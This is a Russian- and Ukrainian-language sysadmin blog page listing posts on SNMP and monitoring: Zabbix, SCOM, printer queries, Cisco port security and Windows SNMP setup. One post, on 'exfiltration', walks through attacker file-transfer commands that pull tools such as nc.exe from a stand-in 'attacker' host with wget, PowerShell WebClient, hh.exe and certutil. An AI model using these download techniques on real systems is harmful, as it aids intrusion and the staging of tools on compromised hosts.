Showing posts with label snmp. Show all posts
Showing posts with label snmp. Show all posts

Thursday, 29 May 2025

Про Firewall Builder.

Привіт привіт.

Вам потрібно оновити брандмауер? Але ви забули, яка саме команда вам потрібна, тому шукаєте документацію, переглядаєте форуми, переглядаєте wiki, мучаєте ChatGPT, ... минає час, минає два. Нарешті ось щось схоже на потрібну команду! Спробуємо! Упсс, а не спрацювало. Ви повертаєтеся до пошуку...

Було так? Авжеш було, і не одноразово

Аж ось є чарівна пігулка - Firewall Builder тобто Конструктор брандмауерів який спрощує налаштування ваших брандмауерів і робить це візуально.  Звісно за умови що ви точно знаєте яка фільтрація трафіку вам потрібна.

Ключові поняття

  • Об'єкти . Конструктор брандмауера базується на концепції об'єктів. Користувачі створюють об'єкти, такі як IP-мережі та IP-адреси, для представлення елементів, які будуть використовуватися в правилах брандмауера.
  • Бібліотеки . Об'єкти зберігаються в бібліотеках. За замовчуванням Firewall Builder постачається з двома бібліотеками об'єктів. Бібліотека під назвою User використовується для зберігання об'єктів, створених користувачем. Бібліотека лише для читання під назвою Standard містить сотні попередньо визначених об'єктів, таких як поширені служби TCP та UDP.
  • Компіляція . Після створення політики з правилами брандмауера в Firewall Builder вам потрібно скомпілювати політику. Компіляція перетворює ваші правила з синтаксису Firewall Builder на синтаксис команд, який використовується цільовою платформою брандмауера. Щоразу, коли ви змінюєте правила брандмауера, вам потрібно перекомпілювати набір правил.

Макет графічного інтерфейсу

Програма Firewall Builder складається з трьох основних панелей, показаних на знімку екрана нижче.


  • Панель об’єктів . Об’єкти в активній бібліотеці відображаються в дереві об’єктів на панелі об’єктів. Для всіх можливих типів об’єктів, які користувач може створити в бібліотеці користувача, визначено порожні папки.
  • Панель правил . Коли об’єкт політики відкривається для редагування, він відображається на панелі правил. Натискання кнопки «+» у верхній частині панелі створює нове правило.
  • Панель редактора . Подвійне клацання на об’єктах відкриває їх для редагування на панелі редактора. Зміни в полях атрибутів об’єкта набувають чинності негайно.

Панелі відкриваються динамічно залежно від того, яку дію виконує користувач. Наприклад, подвійне клацання об’єкта для його редагування відкриє панель редактора, якщо вона ще не відкрита.

Monday, 7 October 2024

Защита сетевого оборудования.


Всем привет.

Хотя я уже далек от администрирования сетевого оборудования, но для тренировки мозга время от времени пользуюсь виртуальными лабораториями типа  CSRv, FTDv, APIC-EM. Разумеется я не мог не обратить внимания на свежее издание Базаров М. М. "Сети глазами хакера", СПб.: БХВ-Петербург, 2025. Сразу видно что ввиду внешней политики страны издания в первую очередь страдают умные головы в той же стране. Так и здесь, знаменитое издательство "БХВ-Петербург" последние годы все чаще просто переиздает популярные книги прошедших лет, либо книги современных ИТ-писателей из Индии. В данном случае изданы "записки на полях" сетевого инженера-практика. Прошу прощения, но ниже главу из книги я вычитывал трижды, хотя опечатки могли все равно остаться.

Безопасность телекоммуникационных устройств - вопрос острый, особенно в по­следнее время. Атаки на инфраструктуры провайдеров происходят все чаще. Сегодня я покажу вам,  как можно защитить сетевое оборудование от потенциального вторжения. Все команды я буду демонстрироваться на Cisco IOS. Однако сами механизмы безо­пасности реализованы у всех вендоров, отличия лишь в иерархии расположения компонентов и синтаксисе. 

Безопасность коммутационной матрицы САМ 

У Cisco IOS  есть несколько проблем сетевой безопасности.  Давайте посмотрим, на какие из них стоит обратить внимание в первую очередь. 

САМ (Content  Addressable  Memory)  - это  ассоциативная память коммутатора, внутри которой хранится таблица МАС-адресов и связанных с ними портов. Это несложный механизм, однако уже очень давно существует хулиганский вектор DоS-атаки, при которой атакующий переполняет САМ-таблицу с  помощью рас­сылки  Ethernet-кaдpoв  с  рандомизирующимися  МАС-адресами  источника,  что перебивает коммутационную матрицу.  Очень известный прием, но не упомянуть о нем я не могу. 

Защитить САМ-таблицы своих коммутаторов очень просто, достаточно использо­вать Port Security. В нашем случае эта настройка подходит для ограничения количе­ства МАС-адресов за портом коммутатора.  Допустим, если мы настроим ограниче­ние в 20  МАС-адресов на порту, а атакующий начнет в эфире флуд (каким-нибудь macof), то к порту будут уже применяться ограничения - в зависимости от настро­енной политики.  Вот пример конфигурации, при которой ставится ограничение в два МАС-адреса,  а при нарушении этого ограничения порт будет выключен. 

Router01(config)#  interface  range  gX/X 

Router01(config-if)#  switchport port-security maximum  <value> 

Router01(config-if)#  switchport port-security violation shutdown 

При такой конфигурации в момент нарушения политики МАС-адресов порт будет переведен в состояние err-disabled. Чтобы настроить автоматическое восстановле­ние порта из этого состояния, понадобится еще одна команда: 

Router01(config)#  errdisaЬle recovery  interval  120 

Router01(config)#  errdisaЬle recovery  cause  psecure-violation 

Saturday, 13 July 2024

Get address book from printer by SNMP.

Hi all.

By the way, yesterday I had to get the address book from the printer. To find out if there is a specific account there or not. Of course, you can export the book to a csv-file, but it's so tedious to go to the printer's admin web-panel every time. I wondered how it could be done remotely. And this is what ChatGPT advised me to do.

Using SNMP (Simple Network Management Protocol) is a valid approach for managing and retrieving information from network devices like printers. If your Xerox printer supports SNMP, you can indeed query it to retrieve the address book.

Here’s how you can proceed with SNMP in PowerShell:

1. Ensure SNMP is enabled on the printer: Check the printer’s settings to ensure SNMP is enabled and properly configured. You might need to consult the printer's manual for details.

2. Identify the OID (Object Identifier): You need to find the correct OID for the address book. OIDs are unique identifiers used to manage and monitor various aspects of a network device. The specific OID for the address book will depend on the printer model and its SNMP implementation.

3. Use PowerShell to query SNMP: PowerShell does not have built-in SNMP cmdlets, but you can use third-party modules like PSSNMP or SnmpSharpNet to perform SNMP queries.

Here’s an example of how to use SnmpSharpNet to perform an SNMP query:

Install and Import SnmpSharpNet

First, you need to download and reference the SnmpSharpNet library.

# Download the SnmpSharpNet.dll from the official source or a trusted repository.

# Example URL: https://github.com/lextudio/sharpsnmplib/releases

# Assume you've downloaded SnmpSharpNet.dll to C:\path\to\SnmpSharpNet.dll

Add-Type -Path "C:\path\to\SnmpSharpNet.dll"


While I don't have a specific OID for the address book for Xerox printers readily available, I can guide you through common OIDs used in Xerox printers and how to find the OID you need.

Saturday, 29 April 2023

Мониторинг температуры с помощью MS SCOM.

Всем привет.

После ввода в эксплуатацию дополнительной стойки серверов НР опять подняли вопрос о контроле температуры в серверной комнате. В принципе я ее уже давно мониторю через Zabbix.

Но вчера я решил сравнить как же может с этим справиться MS System Center Operations Manager 2016 (SCOM), т.е. было решено уже в нем промониторить температуру серверной в которой находиться наш НР через  iLO SNMP.

В SCOM есть понятия монитора и правила. Это несколько разные вещи. Монитор – это некий датчик, отслеживающий изменение параметра и сигнализирующий администратору об отклонениях. Правило – визуализация значений датчика.

Как создавать монитор и правило для НР iLO SNMP рассказано здесь и здесь с рисунками.

Чтобы мониторить обьект через SNMP прежде всего необходимо знать в каком OID зашито значение температуры окружения нашей версии НР iLO. Я знаю, так как нужное значение OID уже указано в моем Zabbix:

1.3.6.1.4.1.232.6.2.6.1.0

Далее я бегло пройдусь по пунктам процесса настройки мониторинга:

1. Прежде всего необходимо добавить сетевое устройство (iLO серверa) в SCOM в "Administration/Network Management". Для этого надо определить новое Discovery Rule, или добавить изменения в существующее.

И запустить  Discovery-правило на выполнение. После успешного определения устройства сервер появится в списке сетевых устройств в "Network Devices".

Wednesday, 14 December 2022

IPMI-функция мониторинга в Zabbix.

Всем привет.

IPMI (Intelligent Platform Management Interface) - интеллектуальный интерфейс управления платформой, предназначенный для автономного мониторинга и управления функциями, встроенными непосредственно в аппаратное и микропрограммное обеспечения серверных платформ. IPMI реализуется в виде отдельного контроллера сервера, который не зависит от операционной системы, BIOS, CPU севера и позволяет удаленно управлять физическим оборудованием.

Можно ли использовать функцию мониторинга IPMI в Zabbix? Можно, но предварительно надо выполнить несколько шагов по настройке IPMI, на примере НР iLO.

В НР iLO.

1. Создаем пользователя с правами администратора. С другими правами не работает (получим ошибки соединения IPMI в zabbix).

2. Активируем IPMI. По умолчанию он отключен.

В Zabbix.

1.  Нам нужно установить пакет IPMITOOL, чтобы сам Zabbix мог выполнять проверки IPMI. После используйте следующую команду, чтобы получить список доступных IPMI-датчиков на вашем устройстве iLO:

# ipmitool -I lanplus -H 192.168.1.220 -U admin -P adminpsw sensor


2. Обязательно установить StartIPMIPollers=5 в zabbix_server.conf. Перезапустить сервис Zabbix. У вас количество IPMI-полеров может быть другим.

Sunday, 6 March 2022

Макросы в Zabbix.

Всем привет.

Макросы в Zabbix могут быть удобны для умного использования. Известно что макросы в Zabbix определяются на нескольких уровнях, более локальный перекрывает предыдущий по ниспадающей:

глобальный макрос

{$PROC_NUM} = 200

Его перекрывает макрос уровня шаблона 

{$PROC_NUM} = 300

А его перекрывает макрос уровня узла сети

{$PROC_NUM} = 500

Например, можно использовать {$USER_MACROS} в качестве порогового значения для таких элементов данных как загрузка CPU, размер свободной памяти, количества процессов и т.д.

{Template OS: system.cpu.load[percpu,avg1].avg(5m)}>{$CPU_LOAD}

{Template OS: vm.memory.size[available].last(0)}<{$MEMORY_FREE}

{Template OS: proc.num[].avg(5m)}>{$PROC_NUM}

Где макрос уровня шаблона: 

{$PROC_NUM} = 300

А макрос уровня узла сети разделить по нагруженности:

- обычный узел сети

{$PROC_NUM} = 300

- сильно нагруженный узел сети

{$PROC_NUM} = 500

- менее загруженный узел сети

{$PROC_NUM} = 200

Friday, 1 October 2021

Про Algorius Net Viewer.

Всем привет.

Коллеги дали попробовать крутой инструмент - Algorius Net Viewer.

Algorius Net Viewer - это программа, которая позволит администраторам сети просматривать, управлять, контролировать, проводить инвентаризацию и получать уведомления на происходящие события. 

Одна из его основных функций - визуализация! Благодаря этому программному обеспечению мы можем удобно просматривать инфраструктуру нашей сети и легко перемещаться по ней. В этом смысле у нас есть редактор схем компьютерных сетей, и мы даже можем легко создать карту нашей сети. Кроме того, он позволяет создавать географические карты, которые позволяют размещать устройства с географической привязкой и четко видеть их географическое положение (OpenStreetMap), а также импортировать и экспортировать документ формата MS Visio.

Еще одна его функция - мониторинг с визуальным отслеживанием маршрута, в котором с интегрированным Тraceroute он покажет нам маршрут к устройству визуально на карте и в виде текста. Он также позволяет сканировать порты, а с помощью встроенной утилиты Wake-On-Lan мы можем включать компьютеры удаленно. Встроенные браузеры SNMP и WMI позволяют просматривать детальную информацию об устройствах, таблицы сетевых интерфейсов, соединений, т.е. упрощается выбор OID и написание WQL выражений для настройки мониторинга.


Algorius Net Viewer осуществлет мониторинг, используя различные протоколы и технологии: ICMP, UDP, TCP, SNMP, WMI, PowerShell, SSH, ARP, DNS, NETBIOS, HTTP(s), FTP(s), SQL, POP3, IMAP, SMTP. Это дает возможность контролировать практически любой аспект работы служб, серверов и других сетевых устройств.

Основные способы опроса (SNMP, PING, WMI) реализованы, как плагины на базе общего API. Это позволяет сторонним разработчикам расширять функционал приложения, создавая дополнительные плагины, адаптированные под собственные потребности.

Tuesday, 6 April 2021

Механизм Low Level Discovery.


Всем привет. 

Для всякого администратора на начальном этапе развития инфраструктуры все просто. Есть  десяток серверов и для мониторинга их в Zabbix все настройки можно проставить вручную. Но любая система постепенно, но неумолимо растет. И вот серверов уже не десять, а пятьдесят или сто! Опять описывать их в Zabbix? Или к примеру мониторинг файловых систем и разделов в Linux в тех случаях когда количество дисков может меняться от сервера к серверу. Т.е. случай на случае когда заранее доподлинно неизвестны характеристики сервера. 

Справиться с такой ситуацией как раз и помогает механизм Low Level Discovery. Низкоуровневое обнаружение (LLD) дает возможность автоматизировать создание метрик (элементов данных), хостов, триггеров и графиков для разных объектов в системе мониторинга.  

Ниже приведу три примера написания правил LLD из онлайн-библиотеки Вячеслава Лохтурова:

  • автоматическое добавление Cisco devices by SNMP.
  • статистика дискового ввода/вывода.
  • мониторинг свободного места на дисках, которые монтируются в процессе работы.

1. Автоматическое добавление Cisco устройств которые мониторятся по SNMP.

1.1. Добавляем правило обнаружения обьекта по SNMP.

Configuration->Discovery

Discovery rules

  Name: Local network

  IP range: 192.168.1.10-20

  Checks: 

    Check type: SNMPv2 agent 

    SNMP community: public

    SNMP OID .1.3.6.1.2.1.1.5.0

      или

             SNMPv2-MIB::sysName.0

    Add

  Update interval: 5m

  Device uniqueness criteria: IP address  

  Enabled: yes

Thursday, 17 December 2020

Как Zabbix взаимодействует с узлами сети.

Всем привет.

Этот пост выглядит как мой конспект одного из вебинаров по Zabbix-у на тему его взаимодействия с узлами сети.

Итак, Zabbix может взаимодействовать с узлами:

1) Zabbix Agent - агент, устанавливаемый на целевые хосты.

2) SNMP - протокол использующийся для управления сетевыми устройствами.

3) JMX - мониторинг JMX можно использовать для наблюдения за счетчиками JMX в Java приложениях.

4) IPMI - интеллектуальный интерфейс управления платформой. В этом контексте Zabbix используется для мониторинга аппаратной платформы серверов.


Для Zabbix хостов и групп:

  • Старайтесь группировать хосты по типам и задачам (хост может быть включен в любое кол-во групп)
  • Давать понятные имена для хостов
  • Впоследствии разделение прав на просмотр и управление
  • Host -  это логическое понятие, один физический хост может содержаться в разных Zabbix Hosts
  • Имя хоста регистрозависимое (для zabbix_sender)


Zabbix имеет типы элементов данных:

В Zabbix организованы активные и пассивные проверки на агентах. Аквивные проверки (от агента к серверу) предпочтительны.

Активные проверки:

- [все параметры агента]

- Hostname: уникальный, регистрозависимый, для активных проверок

- ServerActive: сервер для пересылки данных от агента

- RefreshActiveChecks: частота обновления

Sunday, 6 December 2020

Эксфильтрация файлов.

Всем привет.

Первая задача, с которой хакер сталкивается на этапе построения атаки - это передача файлов. 

Нужно залить на удаленный хост эксплоит, скачать нужный файл, дамп памяти, поднять прокси-сервер, прочее. Такая специфика передачи файлов обусловлена необходимостью выполнить ее исключительно базовыми средствами ОС. Такую операцию называют эксфильтрацией. И тут есть несколько вариантов. 

Первый самый простой вариант передачи файлов под Linux. Для быстрого старта веб-сервера в текущей папке используем встроенный модуль Python2:

attacker> python -m SimpleHTTPServer 8080

Для Рython3: 

attacker>python3 -m http.server 8080

Передаем наш файл:

victim$> wget http://attacker/nmap.exe -O /tmp/nmap.exe

Если на удаленном хосте установлена Windows 7-10, лучше использовать PowerShell:

victim$> powershell -c (new-object System.Net.WebClient).DownloadFile ('http://attacker/nmap.exe' 'C:\Users\victim\desktop\nmap.exe')

Часто HTTP - единственное окно в мир из DMZ, и в Windows тоже приходится им пользоваться, причем разными способами. Наиболее универсальный, но не самый красивый метод выглядит так:

victim$> hh.exe http://attacker/nmap.exe.txt

victim$> cd \users\victim\appdata\local\microsoft\windows\

victim$> dir /s nmap.exe

victim$> cd путь_до_папки

victim$> move nmap.exe[1].txt nmap.exe

Передать файлы в виде простого текста возможно почти всегда. Этот способ подразумевает отправку файла любого содержимого, но с расширением .txt. Можно использовать очень полезную утилиту certutil, которая предназначена для различных криптографических операций. У нее куча опций, ее можно сравнить со швейцарским ножом. Вот как она используется для передачи файла - лезвие №1:

victim$> certutil -urlcache -split -f http://attacker/nc.exe.txt nc.exe.txt

Или так:

victim$>certutil -VerifyCTL -f -split http://attacker/nc.exe.txt

Tuesday, 14 July 2020

SNMP Discovery сканер.

Всем привет.

Выбирая средства мониторинга принтеров по SNMP случайно набрел на программное чудо по названием PrintStore.

Оговорюсь сразу что я ни коей мере не рекламирую сей программный продукт, как сделано здесь, это лишь прелюдия к другой софтине того же автора (или фирмы).

В двух словах - программе PrintStore позволяет автоматизировать учет и мониторинг принтеров, МФУ, факсов и прочей техники в офисе. Существует бесплатная версия с ограничениями по количеству устройств в учете (100) и мониторинге (5) и платная, с лицензиями в зависимости от количества техники в мониторинге.

Из основных возможностей программы мне были интересны только две:

-автоматический поиск техники в сети на основе внутренней базы производителей и моделей. При этом вы и сами можете вручную добавить новую технику.

-автоматический мониторинг счетчиков принтеров по snmp с сохранением данных в базу программы. В идеале вы сканируете сеть, программа находит принтеры и опрашивает их по snmp. Далее вы добавляете найденные принтеры в систему и начинаете с ними работать.

Почему только эти? Потому что исходя из них я нашел на сайте производителя бесплатный сканер "SNMP Discovery". В целом, у сканера есть все необходимое для мониторинга принтеров и состояния катриджей к ним. Плюс, готовая база данных оборудования с картинками и с OID-ми. В принципе, вы можете добавить в эту программу учет любой техники. Просто базу данных к ней вам придется заполнять или импортировать самим. 


Что следует при этом учесть? "SNMP Discovery" не сопровождается и не развивается. Тем не менее она вполне функциональна для чтобы отсканировать вашу сеть. К моему сожалению SNMP-сканер заточен на community по умолчанию, которое обычно "public". Т.е. если в вашей сети Get-community другое то вам придется принтера добавлять вручную и потом на каждом из них в свойствах менять это значение. Если их десяток это не проблема, если их сотни то печаль - можно, конечно, изменить ваше community на "public", а после скана вернуть на свое. Тогда не будет работать мониторинг. В любом случае у программы отличная справка, разобраться можно.


В плане безопасности вашей сети вам будет в тему познакомиться с колонкой "Access", где вы увидите какие из ваших принтеров имеют полный доступ по SNMP, т.е. и на чтение параметров, и на управление. Будет повод задуматься.)

Успехов.

Sunday, 21 June 2020

Мониторинг принтера в Zabbix.

Всем привет.

В мониторинге принтеров с помощью Zabbix главное не столько чтобы принтер был на связи  сколько знать сколько было бумаги отпечатано на каждом из них или в каком состоянии картридж. Из коробки в Zabbix-е таких метрик нет, поэтому умельцы их создают сами. 

Мне позавчера попался, в первом приближении поиска, шаблон Template Printer Xerox  который я успешно протестировал на версиях Zabbix 3.4.11 и 4.4.6.

Его внедрение требует выполнения следующих пунктов:
1. Проверяем что у нас установлены компоненты perl, snmp: 
#sudo apt-get install libnet-snmp-perl 
Скачиваем MIBs:
#sudo download-mibs
Перезапускаем сервер zabbix:
#sudo service zabbix-server restart

2. Копируем prtMarkers_discovery.pl на сервер zabbix в папку со внешними скриптами zabbix (в настройках сервера параметр ExternalScripts )

3. Правим права и владельца prtMarkers_discovery.pl чтобы zabbix мог запускать его.

4. Пробуем запускать скрипт так:

prtMarkers_discovery1.pl ip.printera 161 public
где ip.printera это IP-адрес вашего принтера.

Вывод должен быть почти таким:

{"data":[{"{#MARKER_INDEX}":"6","{#MARKER_DESCR}":"Сборник отраб. тонера, WorkCentre 6605DN, PN#108R01124","{#MARKER_TAGS}":",Сборник отраб. тонера, WorkCentre 6605DN, PN#108R01124,Type:4,"}]}

Если будут ошибки - работаем над их исправлением. 
Если все ок, то еще раз перезапускаем сервер zabbix:
#sudo service zabbix-server restart.

5. Создаем 2 преобразования значений (данные берем из файла value mapping.txt)

Wednesday, 10 June 2020

Опрос ZXHN H108N по SNMP.

Всем привет.

Для теста опроса по протоколу SNMP мне нужен был простенький роутер. К сожалению в используемом дома ASUS RT-N12D1 поддержки SNMP не оказалось. Поэтому пришлось из чулана достать заброшенный ZXHN H108N. В нем такая опция была. Хотя документации по OID-ам для такой модели найти в сети не удалось. 

Поэтому я принял решение провести опрос роутера методом тыка начиная со значения 1.3.6. Для этого подходит утилита snmpwalk, она последовательно запрашивает значения snmp OID в заданном диапазоне. 

В Linux такой опрос выполняется командой:
# snmpwalk -v 2c -c public 192.168.1.2 1.3.6

где в рамках выбранной ветки параметров:
-v 2c - указатель 2-й версии протокола SNMP (хотя сам ZXHN H108N работает на 1-й).

public - так называемое Community, т.е. имя для опроса. Community в SNMP-запросе должно совпадать с Community, настроенном на оборудовании. Рublic – community для мониторинга, настроенное по умолчанию в режиме READONLY на всех устройствах, но для повышения безопасности его лучше изменить на более сложное. Для SNMP v2 передача запроса происходит в нешифрованном виде, и в корпоративных сетях из-за этого часто используется SNMP v3, передающий данные в более безопасном виде. Однако следует учесть что не все версии серверных ОС Windows поддерживают SNMP v3 по умолчанию.

192.168.1.2 – IP-адрес моего роутера.

1.3.6 – начало цифрового идентификатора OID, обозначающее ветку параметров.

Saturday, 2 May 2020

Установка протокола SNMP на сервере.

Всем привет.

Так случается что на сервера Windows по умолчанию  поддержка протокола SNMP не устанавливается. Поэтому этот компонент надо доставить либо руками либо из командной строки. Например так:

@Echo off
pushd %~dp0

sc query SNMP
if %ERRORLEVEL% GEQ 1 (
dism /online /enable-feature /featurename:SNMP
)

regedit /i snmpsrv.reg
net stop SNMP && net start SNMP
popd


А далее следует прописать параметры SNMP протокола, например через реестр:

-автостарт службы
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP]
"Start"=dword:00000002
"Type"=dword:00000010

- адреса источников запросов (несколько)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\PermittedManagers]
"1"="192.168.1.13"
"2"="10.10.12.13"

- общая информация агента SNMP
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\RFC1156Agent]
"sysContact"="Call 911"
"sysLocation"="Forza Ltd."
"sysServices"=dword:0000004c

- имя SNMP комьюнити (может быть несколько)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities]
"publicXXL"=dword:00000004

Почему через реестр? А потому что и сам компонент и его параметры нередко не достать из GUI. Почему так происходит? Не знаю. Microsoft знает.

Удачи.

Tuesday, 24 March 2020

OpenWRT как Linux в каждом устройстве.

Всем привет.

Сейчас на рынке получили широкое распространение различные модели маршрутизаторов и точек доступа к беспроводным WiFi-сетям для небольшого количества пользователей. Практически в любой квартире или доме есть беспроводная точка доступа, выполняющая также роль межсетевого экрана. Тем не меннее частенько их функционал оставляет желать лучшего.

В своей книге "Собираем устройства для тестов на проникновение", ДМК Пресс, 2018, Бирюков А.А. предлагает небольшой обзор этих недорогих устройств которые можно самостоятельно перепрошить, для того чтобы улучшить их функционал.

На данный момент по мнению автора наиболее популярными прошивками считаются:

ОреnWRT - пожалуй, самая известная из альтернативных прошивок. Возможности ее включают, например, FS с функцией записи (как правило, реализуется путем создания раздела jffs2 и использования overlays для объединения со squashfs), пакетный менеджер opkg с репозиторием, в котором более 3000 пакетов, и способностью использовать внешний накопитель для увеличения свободного пространства в /. При этом основная часть прошивки очень маленькая. Фактически это даже не прошивка, а полноценный дистрибутив для роутеров с соответствующими возможностями.

DD-WRT - тоже достаточно популярная прошивка. В отличие от предыдущей, заточена для тех, кто не хочет ковыряться в конфигурационных файлах, устанавливать программы... Разумеется, там есть возможность это сделать, но придется столкнуться с некоторыми затруднениями.

LibreWRT - совершенно свободная прошивка от ESF. Как водится, LibreWRT отпочковалась от ОpenWRT и практически ничем, кроме отсутствия проприетарных драйверов, от последней не отличается. Прошивка примечательна тем, что из-за нее ESF немного изменил свои принципы: если до этого одним из условий "свободы" была необходимость иметь возможность компиляции приложения на том же устройстве, на котором оно запускается, то теперь это необязательно.

Tomato предназначена для роутеров на чипе Broadcom. Одно из преимуществ данной прошивки - то что при обновлении сохраняется старая конфигурация.

Wednesday, 20 March 2019

Windows 10 и служба SNMP.

Всем привет.

Пришлось на ровном месте потратить два дня на одну задачку.  

Вот потерял я у себя в Windows 10 службу SNMP.  Служба ловушек SNMP есть, а самой службы нет. Почему так? Может обронил где и выключил при инсталляции? Замечу что такой фокус начинается со сборки 1803. У меня сейчас 1809.

Покопался в сети, спецы советуют включить такой компонент как "Протокол SNMP", вроде все просто. А не так, не оказалось такого компонента в перечне моей Windows 10.

Далее находим советы по доинсталлированию протокола SNMP с помощью Powershell:

- проверка доступных SNMP-служб
Get-Service -Name snmp*

- инсталлирование службы SNMP (утверждают что работает для сборки 1803)
Enable-WindowsOptionalFeature -online -FeatureName SNMP

У меня сборка 1809 поэтому ищем дальше. 

Правим ключик реестра
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\
UseWUServer = 0

- проверка доступных SNMP-служб
Get-WindowsCapability  -Online -Name "SNMP*"

- инсталлирование службы SNMP
Add-WindowsCapability  -Online -Name "SNMP.Client~~~~0.0.1.0"

ИЛИ

- инсталлирование службы SNMP
Add-WindowsCapability  -Online -Name "SNMP.Client*"


Версия на печать

Популярное